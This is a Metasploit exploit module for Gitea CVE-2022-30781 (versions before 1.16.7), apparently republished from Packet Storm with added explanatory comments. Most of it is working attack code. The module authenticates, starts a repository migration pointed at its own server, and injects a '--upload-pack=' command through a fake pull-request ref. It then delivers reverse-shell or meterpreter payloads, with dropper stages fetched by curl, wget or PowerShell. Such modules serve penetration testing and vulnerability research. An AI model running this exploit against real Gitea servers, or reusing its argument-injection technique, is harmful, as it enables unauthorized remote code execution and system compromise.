

Gitea Git Fetch Remote Code Execution

This Metasploit module exploits the Git fetch command in the Gitea repository migration process to achieve remote command execution on the system. This vulnerability affects Gitea versions prior to 1.16.7.

Packet Storm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Gitea Git Fetch Remote Code Execution (CVE-2022-30781).
#
# Flow, as implemented below:
#   1. authenticate to the target Gitea with USERNAME/PASSWORD (check / exploit);
#   2. create a repository, then ask Gitea to migrate a second repository whose
#      clone URL points at this module's own HTTP server (execute_command);
#   3. answer the migrator's API requests from that server (on_request_uri); the
#      pull-request listing carries the payload in the head ref, prefixed with
#      "--upload-pack=", which the unpatched git fetch path honours as an option.
#
# Defender notes: the module description states the issue is fixed in Gitea
# 1.16.7; the behaviour requires an authenticated account that is allowed to
# create and migrate repositories, and it leaves two randomly named repositories
# under that account (cleanup tries to delete them).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Gitea
  include Msf::Exploit::CmdStager

  # Module metadata and user options.
  #
  # Targets 0 and 2 hand the encoded payload to execute_command as a single
  # command; targets 1 and 3 go through CmdStager (see #exploit). The default
  # target is the Linux dropper.
  #
  # @param info [Hash] metadata merged by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gitea Git Fetch Remote Code Execution',
        'Description' => %q{
          This module exploits Git fetch command in Gitea repository migration
          process that leads to a remote command execution on the system.
          This vulnerability affect Gitea before 1.16.7 version.
        },
        'Author' => [
          'wuhan005', # Original PoC
          'li4n0', # Original PoC
          'krastanoel' # MSF Module
        ],
        'References' => [
          ['CVE', '2022-30781'],
          ['URL', 'https://tttang.com/archive/1607/']
        ],
        'DisclosureDate' => '2022-05-16',
        'License' => MSF_LICENSE,
        'Platform' => %w[unix linux win],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => %i[curl wget echo printf],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
                # Overridden at runtime with a random path in #exploit.
                'CMDSTAGER::URIPATH' => '/payloads'
              }
            }
          ]
        ],
        'DefaultOptions' => { 'WfsDelay' => 30 },
        'DefaultTarget' => 1,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
    register_options([
      Opt::RPORT(3000),
      OptString.new('USERNAME', [true, 'Username to authenticate with']),
      OptString.new('PASSWORD', [true, 'Password to use']),
      OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
    ])
  end

  # Deletes the two repositories created by #execute_command.
  #
  # Skipped entirely when neither the repository owner id nor the migration
  # result was recorded, i.e. exploitation never reached the point of creating
  # anything. Failures are only reported (vprint_*), never raised, so a
  # half-finished cleanup does not mask the original outcome.
  def cleanup
    super
    return if @uid.nil? || @migrate_repo_created.nil?

    [@repo_name, @migrate_repo_name].each do |name|
      res = gitea_remove_repo(repo_path(name))
      # A 200 is treated as "not removed" here (presumably the form was
      # re-rendered rather than redirected) — TODO confirm against the mixin.
      # NOTE(review): `res&.` is redundant after the explicit nil? check.
      if res.nil? || res&.code == 200
        vprint_warning("Unable to remove repository '#{name}'")
      elsif res&.code == 404
        vprint_warning("Repository '#{name}' not found, possibly already deleted")
      else
        vprint_status("Successfully cleanup repository '#{name}'")
      end
    end
  end

  # Vulnerability check: reads the server version, then verifies the supplied
  # credentials by logging in.
  #
  # @return [CheckCode] Appears for versions <= 1.16.6, Safe otherwise.
  #   Mixin errors are mapped as follows: UnknownError -> Unknown,
  #   VersionError -> Detected, CsrfError/AuthenticationError -> Safe.
  #   NOTE(review): reporting a login failure as Safe says nothing about the
  #   server version; Unknown would be the more conservative verdict.
  def check
    return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?

    v = get_gitea_version
    gitea_login(datastore['username'], datastore['password'])
    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')
      return CheckCode::Appears("Version detected: #{v}")
    end

    CheckCode::Safe("Version detected: #{v}")
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e
    return CheckCode::Unknown(e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e
    return CheckCode::Detected(e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
    return CheckCode::Safe(e.message)
  end

  # Registers the URIs this module's HTTP server will answer (see
  # #on_request_uri). Called from #exploit right after start_service, before
  # any repository exists; @migrate_repo_path is therefore still nil at this
  # point and the interpolated paths contain an empty segment — TODO confirm
  # whether hardcoded_uripath treats these as prefixes or exact matches.
  def primer
    [
      '/api/v1/version', '/api/v1/settings/api',
      "/api/v1/repos/#{@migrate_repo_path}",
      "/api/v1/repos/#{@migrate_repo_path}/pulls",
      "/api/v1/repos/#{@migrate_repo_path}/topics"
    ].each { |uri| hardcoded_uripath(uri) } # adding resources
  end

  # Stores the command to deliver and drives the Gitea side of the exploit:
  # creates a repository, then requests a migration whose clone URL points at
  # this module's HTTP server (srvhost_addr:srvport). The command itself is
  # only handed out later, by #on_request_uri, through @p.
  #
  # @param cmd [String] command to run on the target
  # @param _opts [Hash] unused, kept for CmdStager's calling convention
  # @raise via fail_with(Failure::UnexpectedReply) on migration, repository or
  #   CSRF errors from the Gitea mixin
  def execute_command(cmd, _opts = {})
    if target['Type'] == :win_dropper
      # Git on Windows will pass the command to `sh.exe` and not `cmd`.
      # This requires some adjustments:
      # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`
      # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.
      # - Backslashes need to be escaped with `sh.exe`
      cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }
    end

    vprint_status("Executing command: #{cmd}")
    # Random names so repeated runs do not collide with earlier artefacts.
    @repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_path = repo_path(@migrate_repo_name)

    vprint_status("Creating repository \"#{@repo_name}\"")
    @uid = gitea_create_repo(@repo_name)
    vprint_good('Repository created')

    vprint_status('Migrating repository')
    # Plain HTTP to the module's own listener; the auth token is a throwaway value.
    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"
    auth_token = rand_text_alphanumeric(6..15)
    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)
    @p = cmd
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,
         Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
    fail_with(Failure::UnexpectedReply, e.message)
  end

  # Main entry point.
  #
  # When AutoCheck is enabled the login already happened in #check, so it is
  # only repeated here when AutoCheck is off. Command targets pass the encoded
  # payload straight to #execute_command; dropper targets let CmdStager build
  # the command (served from a random CMDSTAGER::URIPATH) and run it in the
  # background with a 1 second delay.
  #
  # @raise via fail_with: TimeoutExpired, UnexpectedReply (CSRF) or NoAccess
  #   (authentication)
  def exploit
    unless datastore['AutoCheck']
      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?

      gitea_login(datastore['username'], datastore['password'])
    end

    start_service
    primer
    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded)
    when :linux_dropper, :win_dropper
      datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"
      execute_cmdstager(background: true, delay: 1)
    end
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e
    fail_with(Failure::UnexpectedReply, e.message)
  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e
    fail_with(Failure::NoAccess, e.message)
  end

  # "owner/name" path of a repository owned by the configured USERNAME.
  #
  # @param name [String] repository name
  # @return [String]
  def repo_path(name)
    "#{datastore['username']}/#{name}"
  end

  # Handler for the module's HTTP server: impersonates the subset of the Gitea
  # API that the target's migrator is expected to request.
  #
  # - /api/v1/version advertises Gitea 1.16.6.
  # - /api/v1/settings/api returns static paging limits.
  # - the repository endpoint points clone_url back at the target's own
  #   repository created in #execute_command.
  # - the pulls endpoint returns one pull request whose head ref is
  #   "--upload-pack=<command>"; this is the line that carries the payload.
  # - CMDSTAGER::URIPATH is delegated to the CmdStager/HttpServer handler.
  # Any other URI falls through the case with no response sent.
  #
  # @param cli [Rex::Proto::Http::ServerClient] connected client
  # @param req [Rex::Proto::Http::Request] request (uri includes the query string)
  def on_request_uri(cli, req)
    case req.uri
    when '/api/v1/version'
      send_response(cli, '{"version": "1.16.6"}')
    when '/api/v1/settings/api'
      data = {
        max_response_items: 50, default_paging_num: 30,
        default_git_trees_per_page: 1000, default_max_blob_size: 10485760
      }
      send_response(cli, data.to_json)
    when "/api/v1/repos/#{@migrate_repo_path}"
      data = {
        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",
        owner: { login: datastore['username'] }
      }
      send_response(cli, data.to_json)
    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"
      send_response(cli, '{"topics":[]}')
    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
      data = [
        {
          base: {
            ref: 'master'
          },
          head: {
            ref: "--upload-pack=#{@p}",
            repo: {
              clone_url: './',
              owner: { login: 'master' }
            }
          },
          updated_at: '2001-01-01T05:00:00+01:00',
          user: {}
        }
      ]
      send_response(cli, data.to_json)
    when datastore['CMDSTAGER::URIPATH']
      super
    end
  end
end
